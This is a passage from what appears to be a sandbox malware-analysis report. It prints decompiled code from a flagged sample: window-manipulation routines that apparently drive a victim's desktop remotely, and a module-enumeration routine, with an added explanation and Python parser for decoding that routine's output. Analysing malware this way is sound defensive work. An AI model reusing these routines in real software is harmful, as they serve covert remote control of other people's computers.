                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4DF3
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4DFF
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4E0B
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4E1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Process$AddressAllocCreateFirstLibraryLoadLocalOpenProcProcess32SessionSnapshotToolhelp32
                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                    • API String ID: 1515997778-3024904723
                                                                                    • Opcode ID: e58a58765657c12f7077a0605f7b4158bc4c1a0c15abd3931df6513e294c4a68
                                                                                    • Instruction ID: 3ff6b37f7126b93490503b6236085d465d51f3832278a0c1bd72875cef1304e1
                                                                                    • Opcode Fuzzy Hash: e58a58765657c12f7077a0605f7b4158bc4c1a0c15abd3931df6513e294c4a68
                                                                                    • Instruction Fuzzy Hash: F5D139B2504345ABD720DB64DC89EDBB7ECEBC4304F404A2AE989D7150EB74B619CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 80%
                                                                                    			E04EB6FC0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                    				signed int _v8;
                                                                                    				char _v276;
                                                                                    				struct _WINDOWPLACEMENT _v320;
                                                                                    				struct tagRECT _v336;
                                                                                    				struct HWND__* _v340;
                                                                                    				struct tagPOINT _v348;
                                                                                    				struct tagPOINT _v356;
                                                                                    				int _v360;
                                                                                    				signed int _t87;
                                                                                    				unsigned int _t91;
                                                                                    				signed short _t93;
                                                                                    				intOrPtr _t95;
                                                                                    				struct HWND__* _t106;
                                                                                    				signed int _t110;
                                                                                    				int _t123;
                                                                                    				long _t124;
                                                                                    				struct HMENU__* _t126;
                                                                                    				void* _t132;
                                                                                    				signed short _t139;
                                                                                    				struct HWND__* _t142;
                                                                                    				void* _t145;
                                                                                    				struct tagPOINT _t147;
                                                                                    				int _t151;
                                                                                    				int _t154;
                                                                                    				intOrPtr _t157;
                                                                                    				long _t158;
                                                                                    				int _t163;
                                                                                    				struct HMENU__* _t164;
                                                                                    				signed short _t166;
                                                                                    				struct HWND__* _t167;
                                                                                    				int _t171;
                                                                                    				struct HWND__* _t172;
                                                                                    				int _t173;
                                                                                    				signed int _t176;
                                                                                    				signed int _t178;
                                                                                    
                                                                                    				_t178 = (_t176 & 0xfffffff8) - 0x164;
                                                                                    				_t87 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t87 ^ _t178;
                                                                                    				_v360 = 0;
                                                                                    				_t157 = __ecx;
                                                                                    				_v348.y = __ecx;
                                                                                    				if(_a4 + 0xffffff00 > 2) {
                                                                                    					_t91 = _a12;
                                                                                    					_t166 =  *(__ecx + 0x78);
                                                                                    					_t147 = _t91;
                                                                                    					_t93 = _t91 >> 0x10;
                                                                                    					_push(_t93);
                                                                                    					_v360 = 1;
                                                                                    					_v356.x = _t147;
                                                                                    					_v356.y = _t93;
                                                                                    					_v348.x =  *(__ecx + 0x74);
                                                                                    					 *(__ecx + 0x74) = _t147;
                                                                                    					 *(__ecx + 0x78) = _t93;
                                                                                    					_t142 = WindowFromPoint(_t147);
                                                                                    					_t95 = _a4;
                                                                                    					if(_t95 != 0x202) {
                                                                                    						if(_t95 != 0x201) {
                                                                                    							if(_t95 != 0x200) {
                                                                                    								goto L2;
                                                                                    							}
                                                                                    							_t106 =  *(_t157 + 0x7c);
                                                                                    							_v340 = _t106;
                                                                                    							if(_t106 == 0) {
                                                                                    								goto L2;
                                                                                    							}
                                                                                    							_t145 = _v348 - _v356.x;
                                                                                    							_v360 = _t166 - _v356.y;
                                                                                    							GetWindowRect(_t106,  &_v336);
                                                                                    							_t151 = _v336.left;
                                                                                    							_t171 = _v336.right - _t151;
                                                                                    							_t154 = _v336.top;
                                                                                    							_t110 =  *((intOrPtr*)(_v348.y + 0x80)) + 0xfffffffe;
                                                                                    							_t163 = _v336.bottom - _t154;
                                                                                    							if(_t110 > 0xf) {
                                                                                    								L42:
                                                                                    								MoveWindow(_v340, _t151, _t154, _t171, _t163, 0);
                                                                                    								goto L11;
                                                                                    							}
                                                                                    							switch( *((intOrPtr*)(_t110 * 4 +  &M04EB7404))) {
                                                                                    								case 0:
                                                                                    									MoveWindow(_v340, _t151 - _t145, _t154 - _v360, _t171, _t163, 0);
                                                                                    									goto L11;
                                                                                    								case 1:
                                                                                    									goto L42;
                                                                                    								case 2:
                                                                                    									L37:
                                                                                    									__esi = __ebx + __esi;
                                                                                    									__ecx = __ecx - __ebx;
                                                                                    									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                    									goto L11;
                                                                                    								case 3:
                                                                                    									L41:
                                                                                    									__esi = __esi - __ebx;
                                                                                    									goto L42;
                                                                                    								case 4:
                                                                                    									__edi = __edi + _v360;
                                                                                    									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                    									goto L11;
                                                                                    								case 5:
                                                                                    									__edx = __edx - _v360;
                                                                                    									__edi = __edi + _v360;
                                                                                    									goto L37;
                                                                                    								case 6:
                                                                                    									__edx = __edx - _v360;
                                                                                    									__edi = __edi + _v360;
                                                                                    									goto L41;
                                                                                    								case 7:
                                                                                    									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                    									goto L11;
                                                                                    								case 8:
                                                                                    									__edi = __edi - _v360;
                                                                                    									__esi = __ebx + __esi;
                                                                                    									__ecx = __ecx - __ebx;
                                                                                    									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                    									goto L11;
                                                                                    								case 9:
                                                                                    									__edi = __edi - _v360;
                                                                                    									goto L41;
                                                                                    							}
                                                                                    						}
                                                                                    						 *(_t157 + 0x7c) = 0;
                                                                                    						_t172 = FindWindowA("Button", 0);
                                                                                    						GetWindowRect(_t172,  &_v336);
                                                                                    						_push(_v356.y);
                                                                                    						if(PtInRect( &_v336, _v356.x) == 0) {
                                                                                    							E04EDDAD0(_t157,  &_v276, 0, 0x104);
                                                                                    							_t178 = _t178 + 0xc;
                                                                                    							RealGetWindowClassA(_t142,  &_v276, 0x104);
                                                                                    							_t123 = lstrcmpA( &_v276, "#32768");
                                                                                    							if(_t123 != 0) {
                                                                                    								_t124 = SendMessageW(_t142, 0x84, 0, _a12);
                                                                                    								 *(_t157 + 0x80) = _t124;
                                                                                    								if(_t124 == 2 || _t124 + 0xfffffff6 <= 7) {
                                                                                    									 *(_t157 + 0x7c) = _t142;
                                                                                    								}
                                                                                    								goto L2;
                                                                                    							}
                                                                                    							_t126 = SendMessageW(_t142, 0x1e1, _t123, _t123);
                                                                                    							_push(_v356.y);
                                                                                    							_t164 = _t126;
                                                                                    							_t173 = MenuItemFromPoint(0, _t164, _v356.x);
                                                                                    							GetMenuItemID(_t164, _t173);
                                                                                    							PostMessageW(_t142, 0x1e5, _t173, 0);
                                                                                    							PostMessageW(_t142, 0x100, 0xd, 0);
                                                                                    							goto L11;
                                                                                    						}
                                                                                    						_push(0);
                                                                                    						_push(0);
                                                                                    						_push(0xf5);
                                                                                    						_push(_t172);
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					 *(_t157 + 0x7c) = 0;
                                                                                    					_t158 = _a12;
                                                                                    					_t132 = SendMessageW(_t142, 0x84, 0, _t158) + 1;
                                                                                    					if(_t132 > 0x15) {
                                                                                    						goto L3;
                                                                                    					}
                                                                                    					_t35 = _t132 + 0x4eb73ec; // 0x4040404
                                                                                    					switch( *((intOrPtr*)(( *_t35 & 0x000000ff) * 4 +  &M04EB73D8))) {
                                                                                    						case 0:
                                                                                    							SetWindowLongA(_t142, 0xfffffff0, GetWindowLongA(_t142, 0xfffffff0) | 0x08000000);
                                                                                    							SendMessageW(_t142, 0x84, 0, _t158);
                                                                                    							goto L3;
                                                                                    						case 1:
                                                                                    							PostMessageW(__ebx, 0x112, 0xf020, 0);
                                                                                    							goto L3;
                                                                                    						case 2:
                                                                                    							_v320.length = 0x2c;
                                                                                    							GetWindowPlacement(__ebx,  &_v320);
                                                                                    							_push(0);
                                                                                    							if((_v320.flags & 0x00000003) == 0) {
                                                                                    								PostMessageW(__ebx, 0x112, 0xf030, ??);
                                                                                    							} else {
                                                                                    								PostMessageW(__ebx, 0x112, 0xf120, ??);
                                                                                    							}
                                                                                    							goto L3;
                                                                                    						case 3:
                                                                                    							PostMessageW(__ebx, 0x10, 0, 0);
                                                                                    							goto L3;
                                                                                    						case 4:
                                                                                    							goto L3;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_v356.x =  *(__ecx + 0x74);
                                                                                    					_t139 =  *(__ecx + 0x78);
                                                                                    					_push(_t139);
                                                                                    					_v356.y = _t139;
                                                                                    					_t142 = WindowFromPoint( *(__ecx + 0x74));
                                                                                    					L2:
                                                                                    					_t158 = _a12;
                                                                                    					L3:
                                                                                    					ScreenToClient(_t142,  &_v356);
                                                                                    					_push(_v356.y);
                                                                                    					_t167 = ChildWindowFromPoint(_t142, _v356.x);
                                                                                    					if(_t167 == 0) {
                                                                                    						L7:
                                                                                    						if(_v360 != 0) {
                                                                                    							_t158 = (_v356.y & 0x0000ffff) << 0x00000010 | _v356.x & 0x0000ffff;
                                                                                    						}
                                                                                    						_push(_t158);
                                                                                    						_push(_a8);
                                                                                    						_push(_a4);
                                                                                    						_push(_t142);
                                                                                    						L10:
                                                                                    						PostMessageW();
                                                                                    						L11:
                                                                                    						return E04ED572E(_v8 ^ _t178);
                                                                                    					}
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					while(_t167 != _t142) {
                                                                                    						_t142 = _t167;
                                                                                    						ScreenToClient(_t167,  &_v356);
                                                                                    						_push(_v356.y);
                                                                                    						_t167 = ChildWindowFromPoint(_t167, _v356);
                                                                                    						if(_t167 != 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						goto L7;
                                                                                    					}
                                                                                    					goto L7;
                                                                                    				}
                                                                                    			}
                                                                                    0x04eb70a1
                                                                                    0x04eb703a
                                                                                    0x04eb7040
                                                                                    0x04eb7048
                                                                                    0x04eb704c
                                                                                    0x04eb7052
                                                                                    0x04eb7061
                                                                                    0x04eb7065
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb7065
                                                                                    0x00000000
                                                                                    0x04eb7040

                                                                                    APIs
                                                                                    • WindowFromPoint.USER32(?,?), ref: 04EB700E
                                                                                    • ScreenToClient.USER32 ref: 04EB701F
                                                                                    • ChildWindowFromPoint.USER32 ref: 04EB702E
                                                                                    • ScreenToClient.USER32 ref: 04EB704C
                                                                                    • ChildWindowFromPoint.USER32 ref: 04EB705B
                                                                                    • PostMessageW.USER32(00000000,?,?,?), ref: 04EB7085
                                                                                    • WindowFromPoint.USER32 ref: 04EB70D0
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB70FF
                                                                                    • GetWindowLongA.USER32 ref: 04EB711C
                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 04EB712B
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB713A
                                                                                    • GetWindowPlacement.USER32(00000000,?), ref: 04EB717B
                                                                                    • FindWindowA.USER32 ref: 04EB71CC
                                                                                    • GetWindowRect.USER32 ref: 04EB71DA
                                                                                    • PtInRect.USER32(?,00000001,00000001), ref: 04EB71ED
                                                                                    • RealGetWindowClassA.USER32(00000000,?,00000104), ref: 04EB7225
                                                                                    • lstrcmpA.KERNEL32(?,#32768), ref: 04EB7235
                                                                                    • SendMessageW.USER32(00000000,000001E1,00000000,00000000), ref: 04EB7247
                                                                                    • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 04EB725A
                                                                                    • GetMenuItemID.USER32(00000000,00000000), ref: 04EB7264
                                                                                    • PostMessageW.USER32(00000000,000001E5,00000000,00000000), ref: 04EB7279
                                                                                    • PostMessageW.USER32(00000000,00000100,0000000D,00000000), ref: 04EB7285
                                                                                    • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 04EB7297
                                                                                    • GetWindowRect.USER32 ref: 04EB72EC
                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 04EB7333
                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04EB7350
                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04EB7369
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04EB738A
                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04EB73B1
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 04EB73CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$Message$Move$FromPoint$Send$PostRect$ChildClientItemLongMenuScreen$ClassFindPlacementReallstrcmp
                                                                                    • String ID: #32768$,$Button
                                                                                    • API String ID: 4148729706-3823977346
                                                                                    • Opcode ID: 7094301abf9a49e5439b3214486582f7ca609cef57ba31ee408ff4df99c30971
                                                                                    • Instruction ID: 220414fda662110b323bdf235ee3d7a07bd5bafe4556d0ac576fbd8a22c4b9c9
                                                                                    • Opcode Fuzzy Hash: 7094301abf9a49e5439b3214486582f7ca609cef57ba31ee408ff4df99c30971
                                                                                    • Instruction Fuzzy Hash: ACB18C71204301BFD7218FA5DC49FABBBA8EBC8715F005A19F995A3681D774EC04DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 87%
                                                                                    			E04EC47F0(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                    				void* _v8;
                                                                                    				long _v12;
                                                                                    				WCHAR* _v16;
                                                                                    				WCHAR* _v20;
                                                                                    				WCHAR* _v24;
                                                                                    				WCHAR* _v28;
                                                                                    				struct tagPROCESSENTRY32W _v32;
                                                                                    				void* _v36;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				WCHAR* _t105;
                                                                                    				WCHAR* _t106;
                                                                                    				WCHAR* _t107;
                                                                                    				WCHAR* _t108;
                                                                                    				struct tagPROCESSENTRY32W _t110;
                                                                                    				int _t126;
                                                                                    				int _t127;
                                                                                    				int _t128;
                                                                                    				int _t129;
                                                                                    				int _t130;
                                                                                    				signed short* _t178;
                                                                                    				signed int _t179;
                                                                                    				signed int _t185;
                                                                                    				WCHAR* _t186;
                                                                                    				void* _t187;
                                                                                    				void* _t188;
                                                                                    				WCHAR* _t189;
                                                                                    				void* _t192;
                                                                                    				signed int _t195;
                                                                                    				WCHAR* _t196;
                                                                                    				WCHAR* _t197;
                                                                                    				intOrPtr* _t198;
                                                                                    				struct tagPROCESSENTRY32W _t201;
                                                                                    				void* _t203;
                                                                                    				void* _t205;
                                                                                    				void* _t207;
                                                                                    				struct tagPROCESSENTRY32W _t208;
                                                                                    				WCHAR* _t209;
                                                                                    				void* _t210;
                                                                                    				long _t218;
                                                                                    				long _t219;
                                                                                    				void* _t222;
                                                                                    				void* _t224;
                                                                                    				void* _t226;
                                                                                    				void* _t228;
                                                                                    				void* _t230;
                                                                                    				void* _t231;
                                                                                    				void* _t233;
                                                                                    				void* _t239;
                                                                                    
                                                                                    				_t239 = __eflags;
                                                                                    				_t187 = __ecx;
                                                                                    				_t210 = LocalAlloc(0x40, 0x400);
                                                                                    				_v12 = 1;
                                                                                    				_push(0x208);
                                                                                    				_v8 = _t210;
                                                                                    				 *_t210 = 0x81;
                                                                                    				_t105 = E04ED5785(_t187, _t210, _t239);
                                                                                    				_push(0x208);
                                                                                    				_t186 = _t105;
                                                                                    				_t106 = E04ED5785(_t187, _t210, _t239);
                                                                                    				_push(0x208);
                                                                                    				_v16 = _t106;
                                                                                    				_t107 = E04ED5785(_t187, _t210, _t239);
                                                                                    				_push(0x208);
                                                                                    				_v20 = _t107;
                                                                                    				_t108 = E04ED5785(_t187, _t210, _t239);
                                                                                    				_push(0x28);
                                                                                    				_v24 = _t108;
                                                                                    				_v28 = E04ED5785(_t187, _t210, _t239);
                                                                                    				_t110 = E04ED5744(_t210, _t239, 0x428);
                                                                                    				_t231 = _t230 + 0x18;
                                                                                    				_t208 = _t110;
                                                                                    				_v32 = _t208;
                                                                                    				 *_t208 = 0x428;
                                                                                    				_t188 = CreateToolhelp32Snapshot(0x18, _a4);
                                                                                    				_v36 = _t188;
                                                                                    				if(_t188 != 0xffffffff) {
                                                                                    					if(Module32FirstW(_t188, _t208) != 0) {
                                                                                    						_t10 = _t208 + 0x20; // 0x20
                                                                                    						_t209 = _t208 + 0x220;
                                                                                    						_a4 = _t10;
                                                                                    						do {
                                                                                    							if( *_t209 != 0x3f005c || _t209[2] != 0x5c003f) {
                                                                                    								_t189 = _t209;
                                                                                    								_t198 = L"\\SystemRoot";
                                                                                    								_t210 = 0x12;
                                                                                    								while(1) {
                                                                                    									__eflags =  *_t189 -  *_t198;
                                                                                    									if( *_t189 !=  *_t198) {
                                                                                    										goto L16;
                                                                                    									}
                                                                                    									_t189 =  &(_t189[2]);
                                                                                    									_t198 = _t198 + 4;
                                                                                    									_t210 = _t210 - 4;
                                                                                    									__eflags = _t210;
                                                                                    									if(_t210 >= 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										__eflags =  *_t189 -  *_t198;
                                                                                    										if( *_t189 ==  *_t198) {
                                                                                    											wsprintfW(_t186, L"C:\\WINDOWS%s", _v32 + 0x24c);
                                                                                    											_t231 = _t231 + 0xc;
                                                                                    											_t197 = _t186;
                                                                                    											_t207 = _t209 - _t186;
                                                                                    											asm("o16 nop [eax+eax]");
                                                                                    											do {
                                                                                    												_t185 =  *_t197 & 0x0000ffff;
                                                                                    												_t197 =  &(_t197[1]);
                                                                                    												 *(_t207 + _t197 - 2) = _t185;
                                                                                    												__eflags = _t185;
                                                                                    											} while (_t185 != 0);
                                                                                    										}
                                                                                    									}
                                                                                    									goto L16;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t178 = _v32 + 0x230;
                                                                                    								_t203 = _t186 - _t178;
                                                                                    								do {
                                                                                    									_t195 =  *_t178 & 0x0000ffff;
                                                                                    									_t178 =  &(_t178[1]);
                                                                                    									 *(_t203 + _t178 - 2) = _t195;
                                                                                    								} while (_t195 != 0);
                                                                                    								_t196 = _t186;
                                                                                    								_t205 = _t209 - _t186;
                                                                                    								asm("o16 nop [eax+eax]");
                                                                                    								do {
                                                                                    									_t179 =  *_t196 & 0x0000ffff;
                                                                                    									_t196 =  &(_t196[1]);
                                                                                    									 *(_t205 + _t196 - 2) = _t179;
                                                                                    								} while (_t179 != 0);
                                                                                    							}
                                                                                    							L16:
                                                                                    							E04EC5D90(_t186, _t209, _v16, _t209, _t210, _v20, _v24);
                                                                                    							asm("xorps xmm0, xmm0");
                                                                                    							_t233 = _t231 + 8;
                                                                                    							asm("movups [eax], xmm0");
                                                                                    							asm("movups [eax+0x10], xmm0");
                                                                                    							asm("movq [eax+0x20], xmm0");
                                                                                    							E04EC4730(_t209, _v28, _t210);
                                                                                    							_t126 = lstrlenW(_t209);
                                                                                    							_t127 = lstrlenW(_v28);
                                                                                    							_t128 = lstrlenW(_v24);
                                                                                    							_t129 = lstrlenW(_v20);
                                                                                    							_t130 = lstrlenW(_v16);
                                                                                    							_t218 = _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _t126 + _t127 + _t128 + _t129 + _t130 + lstrlenW(_a4) + _v12 + 0x14;
                                                                                    							if(LocalSize(_v8) >= _t218) {
                                                                                    								_t192 = _v8;
                                                                                    							} else {
                                                                                    								_t192 = LocalReAlloc(_v8, _t218, 0x42);
                                                                                    								_v8 = _t192;
                                                                                    							}
                                                                                    							_t201 = _v32;
                                                                                    							_t219 = _v12;
                                                                                    							 *((intOrPtr*)(_t219 + _t192)) =  *((intOrPtr*)(_t201 + 0x14));
                                                                                    							 *((intOrPtr*)(_t219 + _t192 + 4)) =  *((intOrPtr*)(_t201 + 0x18));
                                                                                    							_v12 = _t219 + 8;
                                                                                    							E04EDDC90(_v8 + _v12, _a4, 2 + lstrlenW(_t201 + 0x20) * 2);
                                                                                    							_t222 = _v12 + 2 + lstrlenW(_a4) * 2;
                                                                                    							E04EDDC90(_v8 + _t222, _t209, 2 + lstrlenW(_t209) * 2);
                                                                                    							_t224 = _t222 + lstrlenW(_t209) * 2 + 2;
                                                                                    							E04EDDC90(_v8 + _t224, _v16, 2 + lstrlenW(_v16) * 2);
                                                                                    							_t226 = _t224 + lstrlenW(_v16) * 2 + 2;
                                                                                    							E04EDDC90(_v8 + _t226, _v20, 2 + lstrlenW(_v20) * 2);
                                                                                    							_t228 = _t226 + lstrlenW(_v20) * 2 + 2;
                                                                                    							E04EDDC90(_v8 + _t228, _v24, 2 + lstrlenW(_v24) * 2);
                                                                                    							_t210 = _t228 + lstrlenW(_v24) * 2 + 2;
                                                                                    							E04EDDC90(_v8 + _t210, _v28, 2 + lstrlenW(_v28) * 2);
                                                                                    							_t231 = _t233 + 0x48;
                                                                                    							_v12 = _t210 + (lstrlenW(_v28) + 1) * 2;
                                                                                    						} while (Module32NextW(_v36, _v32) != 0);
                                                                                    						_t210 = _v8;
                                                                                    						_t208 = _v32;
                                                                                    					}
                                                                                    					CloseHandle(_v36);
                                                                                    				}
                                                                                    				E04ED573F(_t186);
                                                                                    				E04ED573F(_v16);
                                                                                    				E04ED573F(_v20);
                                                                                    				E04ED573F(_v24);
                                                                                    				E04ED573F(_v28);
                                                                                    				_push(0x428);
                                                                                    				E04ED5777(_t208);
                                                                                    				return LocalReAlloc(_t210, _v12, 0x42);
                                                                                    			}
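
What E04EC47F0 does, read from the decompilation above: it takes a snapshot with CreateToolhelp32Snapshot(0x18, pid), that is TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, walks it with Module32FirstW and Module32NextW (the 0x428-byte structure the decompiler labels tagPROCESSENTRY32W is MODULEENTRY32W), rewrites each module path so that a leading \??\ is stripped and a leading \SystemRoot becomes the hard-coded C:\WINDOWS, and appends one entry per module to a LocalAlloc'd buffer whose first byte is 0x81: modBaseAddr and modBaseSize (structure offsets 0x14 and 0x18) followed by six NUL-terminated UTF-16LE strings, namely szModule, the rewritten szExePath, and four strings derived from the path by E04EC5D90 and E04EC4730, which this extract does not decompile. The buffer is grown with LocalReAlloc as needed and trimmed to its used length on return. The following Python is an added example, not Joe Sandbox output and not the sample's code; it models that record layout and parses it back so that a buffer recovered from memory or from the wire can be decoded. Assumptions: the four undescribed strings are carried as opaque extra strings; the two prefixes are matched at exactly their own length (the decompiled byte offsets 0x230 and 0x24c do not agree with a four- and an eleven-character prefix and are treated here as a decompiler artifact); the sample modules in the block are constructed.

```python
import struct
from dataclasses import dataclass, field
from typing import List, Tuple

RECORD_TYPE = 0x81        # first byte E04EC47F0 stores in its LocalAlloc'd buffer
STRINGS_PER_MODULE = 6    # szModule, szExePath, then four strings the extract does not identify


@dataclass
class ModuleRecord:
    base: int             # MODULEENTRY32W.modBaseAddr (32-bit process in this sample)
    size: int             # MODULEENTRY32W.modBaseSize
    name: str             # MODULEENTRY32W.szModule
    path: str             # MODULEENTRY32W.szExePath, stored after normalisation
    extra: List[str] = field(default_factory=lambda: ["", "", "", ""])  # assumed: opaque


def normalize_path(path: str) -> str:
    """The two rewrites in the loop body: drop an NT-namespace '\\??\\' prefix, or
    replace a leading '\\SystemRoot' with the hard-coded 'C:\\WINDOWS' (the sample
    never consults the real system root). Exact prefix lengths are an assumption."""
    if path.startswith("\\??\\"):
        return path[len("\\??\\"):]
    if path.startswith("\\SystemRoot"):
        return "C:\\WINDOWS" + path[len("\\SystemRoot"):]
    return path


def _wstr(s: str) -> bytes:
    """NUL-terminated UTF-16LE: the lstrlenW(s) * 2 + 2 bytes each copy moves."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_record(modules: List[ModuleRecord]) -> bytes:
    """Serialise modules the way the loop does: type byte, then per module
    <u32 base><u32 size> and six NUL-terminated wide strings."""
    out = bytearray([RECORD_TYPE])
    for m in modules:
        out += struct.pack("<II", m.base, m.size)
        out += _wstr(m.name)
        out += _wstr(normalize_path(m.path))
        for s in m.extra:
            out += _wstr(s)
    return bytes(out)


def _read_wstr(buf: bytes, pos: int) -> Tuple[str, int]:
    """Read one NUL-terminated UTF-16LE string; refuse to run off the buffer."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError("unterminated UTF-16LE string at offset %d" % pos)
        if buf[end:end + 2] == b"\x00\x00":
            return buf[pos:end].decode("utf-16-le"), end + 2
        end += 2


def parse_record(buf: bytes) -> List[ModuleRecord]:
    """Decode a buffer produced by build_record (or carved from the sample)."""
    if not buf or buf[0] != RECORD_TYPE:
        raise ValueError("not a 0x81 module-list record")
    pos, modules = 1, []
    while pos < len(buf):
        if pos + 8 > len(buf):
            raise ValueError("truncated module header at offset %d" % pos)
        base, size = struct.unpack_from("<II", buf, pos)
        pos += 8
        strings = []
        for _ in range(STRINGS_PER_MODULE):
            s, pos = _read_wstr(buf, pos)
            strings.append(s)
        modules.append(ModuleRecord(base, size, strings[0], strings[1], strings[2:]))
    return modules


# Constructed sample input (not taken from the report): two modules as a Toolhelp
# snapshot of a 32-bit process might list them, one per path form the loop handles.
SAMPLE_MODULES = [
    ModuleRecord(0x77A00000, 0x1A4000, "ntdll.dll",
                 "\\??\\C:\\Windows\\System32\\ntdll.dll"),
    ModuleRecord(0x76E00000, 0x0E0000, "kernel32.dll",
                 "\\SystemRoot\\System32\\kernel32.dll", ["v1", "v2", "v3", "v4"]),
]


def roundtrip(modules: List[ModuleRecord] = SAMPLE_MODULES) -> List[ModuleRecord]:
    """Build then parse; the parsed paths are the normalised ones."""
    return parse_record(build_record(modules))


if __name__ == "__main__":
    for m in roundtrip():
        print("0x%08x 0x%06x %-14s %s %s" % (m.base, m.size, m.name, m.path, m.extra))
```

parse_record raises on a truncated header or an unterminated string instead of returning partial results, which is what you want when feeding it carved memory: a silent short parse would hide exactly the module entries an analyst is looking for.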


                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Local$Alloc$Module32$CloseCreateFirstHandleNextSizeSnapshotToolhelp32wsprintf
                                                                                    • String ID: C:\WINDOWS%s$\SystemRoot
                                                                                    • API String ID: 671652143-1245600093
                                                                                    • Opcode ID: 78c3acba6b88d1de3a1acdd3605645aeb0a856caa341940e88ef6eafb1d8569a
                                                                                    • Instruction ID: 300f6afd1acc2d0c90b178388c1964f99a14cba0cc5eaf98ab483260b0a16b44
                                                                                    • Opcode Fuzzy Hash: 78c3acba6b88d1de3a1acdd3605645aeb0a856caa341940e88ef6eafb1d8569a
                                                                                    • Instruction Fuzzy Hash: 67B1B071E00119EFCF00EFA4DD49AAEBBB5FF84309F104068E915E7251EB35A912DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 80%
                                                                                    			E04ECB280(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				short _v204;
                                                                                    				char _v208;
                                                                                    				char _v308;
                                                                                    				char _v309;
                                                                                    				intOrPtr _v315;
                                                                                    				char _v316;
                                                                                    				signed int _v320;
                                                                                    				char _v340;
                                                                                    				char _v380;
                                                                                    				char _v512;
                                                                                    				void _v516;
                                                                                    				intOrPtr _v520;
                                                                                    				signed short* _v524;
                                                                                    				void* _v529;
                                                                                    				void* _v536;
                                                                                    				int _v540;
                                                                                    				signed int _v544;
                                                                                    				intOrPtr _v548;
                                                                                    				void* _v549;
                                                                                    				signed int _v552;
                                                                                    				signed int _t113;
                                                                                    				void* _t115;
                                                                                    				void* _t117;
                                                                                    				long _t122;
                                                                                    				void* _t129;
                                                                                    				signed int _t135;
                                                                                    				signed int _t138;
                                                                                    				long _t150;
                                                                                    				void* _t152;
                                                                                    				signed int _t158;
                                                                                    				void* _t166;
                                                                                    				signed int _t167;
                                                                                    				void* _t173;
                                                                                    				long _t174;
                                                                                    				void* _t179;
                                                                                    				intOrPtr _t181;
                                                                                    				signed int _t184;
                                                                                    				signed int _t186;
                                                                                    				void* _t187;
                                                                                    				void* _t189;
                                                                                    				signed int _t199;
                                                                                    				char* _t206;
                                                                                    				void* _t208;
                                                                                    				signed int _t216;
                                                                                    				signed int _t218;
                                                                                    				signed int _t219;
                                                                                    				signed int _t220;
                                                                                    				signed int _t221;
                                                                                    				signed int _t223;
                                                                                    				signed int _t229;
                                                                                    				signed int _t236;
                                                                                    				void* _t242;
                                                                                    				intOrPtr _t245;
                                                                                    				void* _t246;
                                                                                    				long _t250;
                                                                                    				void* _t252;
                                                                                    				void* _t254;
                                                                                    				signed int _t258;
                                                                                    				signed int _t260;
                                                                                    				void* _t261;
                                                                                    				void* _t263;
                                                                                    				void* _t264;
                                                                                    
                                                                                    				_t264 = __eflags;
                                                                                    				_t231 = __edi;
                                                                                    				_t260 = (_t258 & 0xfffffff8) - 0x22c;
                                                                                    				_t113 =  *0x4f03008; // 0x3d21fb31
